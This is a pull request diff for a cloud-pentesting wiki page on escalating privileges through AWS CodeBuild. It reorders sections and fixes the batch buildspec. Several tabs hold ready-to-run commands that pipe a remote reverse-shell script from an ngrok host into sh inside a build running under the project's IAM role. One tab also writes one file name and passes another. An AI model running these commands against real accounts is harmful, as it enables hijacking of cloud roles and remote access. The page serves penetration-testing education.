### PR TITLE
Privesc page updated to improve understanding and fix wrong information at StartBuildBatch tab 

### DIFF
--- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
+++ b/pentesting-cloud/aws-security/aws-privilege-escalation/aws-codebuild-privesc.md
@@ -23,9 +23,68 @@ Get more info in:
 [aws-codebuild-enum.md](../aws-services/aws-codebuild-enum.md)
 {% endcontent-ref %}
 
+### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
+
+Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
+
+{% tabs %}
+{% tab title="StartBuild" %}
+{% code overflow="wrap" %}
+```bash
+cat > /tmp/buildspec.yml <<EOF
+version: 0.2
+
+phases:
+  build:
+      commands:
+            - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
+EOF
+
+aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/buildspec.yml
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="StartBuildBatch" %}
+{% code overflow="wrap" %}
+```bash
+cat > hacktricks.yml <<EOF
+version: 0.2
+
+batch:
+  fast-fail: false
+  build-list:
+    - identifier: build1
+      env:
+        variables:
+          BUILD_ID: build1
+      buildspec: |
+        version: 0.2
+        env:
+          shell: sh
+        phases:
+          build:
+            commands:
+              - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
+      ignore-failure: true
+EOF
+
+aws codebuild start-build-batch --project <project-name> --buildspec-override file:///tmp/buildspec.yml
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+**Note**: The difference between these two commands is that:
+- `StartBuild` triggers a single build job using a specific `buildspec.yml`.
+- `StartBuildBatch` allows you to start a batch of builds, with more complex configurations (like running multiple builds in parallel).
+
+**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
+
 ### `iam:PassRole`, `codebuild:CreateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
 An attacker with the **`iam:PassRole`, `codebuild:CreateProject`, and `codebuild:StartBuild` or `codebuild:StartBuildBatch`** permissions would be able to **escalate privileges to any codebuild IAM role** by creating a running one.
+
 
 {% tabs %}
 {% tab title="Example1" %}
@@ -149,88 +208,11 @@ aws codebuild start-build --project-name codebuild-demo-project
 
 **Potential Impact:** Direct privesc to any AWS Codebuild role.
 
-### `codebuild:StartBuild` | `codebuild:StartBuildBatch`
-
-Only with one of these permissions it's enough to trigger a build with a new buildspec and steal the token of the iam role assigned to the project:
-
-{% tabs %}
-{% tab title="StartBuild" %}
-{% code overflow="wrap" %}
-```bash
-cat > /tmp/builspec.yml <<EOF
-version: 0.2
-
-phases:
-  build:
-      commands:
-            - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
-EOF
-
-aws codebuild start-build --project <project-name> --buildspec-override file:///tmp/builspec.yml
-```
-{% endcode %}
-{% endtab %}
-
-{% tab title="StartBuildBatch" %}
-{% code overflow="wrap" %}
-```bash
-cat > /tmp/builspec.yml <<EOF
-version: 0.2
-
-phases:
-  build:
-      commands:
-            - curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh
-EOF
-
-aws codebuild start-build-batch --project <project-name> --buildspec-override file:///tmp/builspec.yml
-```
-{% endcode %}
-{% endtab %}
-{% endtabs %}
-
-**Potential Impact:** Direct privesc to attached AWS Codebuild roles.
-
 ### `codebuild:UpdateProject`, (`codebuild:StartBuild` | `codebuild:StartBuildBatch`)
 
 Like in the previous section but **without the `iam:PassRole` permission**, you can abuse this permissions to **modify existing Codebuild projects and access the role they already have assigned**.
 
 {% tabs %}
-{% tab title="StartBuildBatch" %}
-```sh
-REV_PATH="/tmp/codebuild_pwn.json"
-
-# Get rev shell
-REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
-
-# You need to indicate the name of the project you want to modify
-JSON="{
-    \"name\": \"codebuild_lab_3_project\",
-    \"source\": {
-        \"type\": \"NO_SOURCE\",
-        \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
-    },
-    \"artifacts\": {
-        \"type\": \"NO_ARTIFACTS\"
-    },
-    \"environment\": {
-        \"type\": \"LINUX_CONTAINER\",
-        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
-        \"computeType\": \"BUILD_GENERAL1_SMALL\",
-        \"imagePullCredentialsType\": \"CODEBUILD\"
-    }
-}"
-
-printf "$JSON" > $REV_PATH
-
-# Note how it's used a image from AWS public ECR instead from docjerhub as dockerhub rate limits CodeBuild!
-
-aws codebuild update-project --cli-input-json file://$REV_PATH
-
-aws codebuild start-build-batch --project-name codebuild-demo-project
-```
-{% endtab %}
-
 {% tab title="StartBuild" %}
 {% code overflow="wrap" %}
 ```sh
@@ -266,6 +248,43 @@ printf "$JSON" > $REV_PATH
 aws codebuild update-project --cli-input-json file://$REV_PATH
 
 aws codebuild start-build --project-name codebuild-demo-project
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="StartBuildBatch" %}
+{% code overflow="wrap" %}
+```sh
+REV_PATH="/tmp/codebuild_pwn.json"
+
+# Get rev shell
+REV="curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh"
+
+# You need to indicate the name of the project you want to modify
+JSON="{
+    \"name\": \"codebuild_lab_3_project\",
+    \"source\": {
+        \"type\": \"NO_SOURCE\",
+        \"buildspec\": \"version: 0.2\\\\n\\\\nbatch:\\\\n  fast-fail: false\\\\n  build-list:\\\\n    - identifier: build1\\\\n      env:\\\\n        variables:\\\\n          BUILD_ID: build1\\\\n      buildspec: |\\\\n        version: 0.2\\\\n        env:\\\\n          shell: sh\\\\n        phases:\\\\n          build:\\\\n            commands:\\\\n              - curl https://reverse-shell.sh/4.tcp.eu.ngrok.io:11125 | sh\\\\n      ignore-failure: true\\\\n\"
+    },
+    \"artifacts\": {
+        \"type\": \"NO_ARTIFACTS\"
+    },
+    \"environment\": {
+        \"type\": \"LINUX_CONTAINER\",
+        \"image\": \"public.ecr.aws/h0h9t7p1/alpine-bash-curl-jq:latest\",
+        \"computeType\": \"BUILD_GENERAL1_SMALL\",
+        \"imagePullCredentialsType\": \"CODEBUILD\"
+    }
+}"
+
+printf "$JSON" > $REV_PATH
+
+# Note how it's used a image from AWS public ECR instead from dockerhub as dockerhub rate limits CodeBuild!
+
+aws codebuild update-project --cli-input-json file://$REV_PATH
+
+aws codebuild start-build-batch --project-name codebuild-demo-project
 ```
 {% endcode %}
 {% endtab %}
@@ -319,7 +338,7 @@ aws codebuild start-build --project-name <project-name>
 # Wait for the reverse shell :)
 ```
 
-You can use something like this **builspec** to get a **reverse shell**:
+You can use something like this **buildspec** to get a **reverse shell**:
 
 {% code title="buildspec.yml" %}
 ```yaml


### PR DESCRIPTION

I have made a fundamental change and that is that inside ### `codebuild:StartBuild` | `codebuild:StartBuildBatch` there was a wrong information in {% tab title=“StartBuildBatch” %} and the content of buildspec.yml was not correct it must be according to Batch build buildspec.

I have also tidied up the page to put `codebuild:StartBuild` | `codebuild:StartBuildBatch` first because as this is necessary in other forms of privilege escalation so I think it is interesting to know this concept firsty.

I have also ordered the tabs to follow a concordance and always put StartBuild on the left and StartBuildBatch on the right.